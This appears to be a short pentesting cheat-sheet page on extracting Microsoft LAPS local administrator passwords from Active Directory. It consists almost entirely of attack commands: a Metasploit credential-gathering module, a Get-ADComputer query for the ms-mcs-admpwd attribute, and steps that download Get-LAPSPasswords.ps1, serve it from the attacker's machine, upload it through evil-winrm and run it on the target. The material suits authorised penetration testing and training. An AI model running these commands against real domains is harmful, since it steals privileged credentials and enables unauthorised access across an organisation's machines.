LAPS (Local Administrator Password Solution) Pentesting
Enumeration
msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploitObtain Administrator's Password
net user <current-username>
# Global Group memberships *LAPS_ReadersUsing Get-ADComputer
Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'Using Get-LAPSPasswords.ps1
wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1python3 -m http.server 8000curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directoryPS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1
.\Get-LAPSPasswords.ps1
Last updated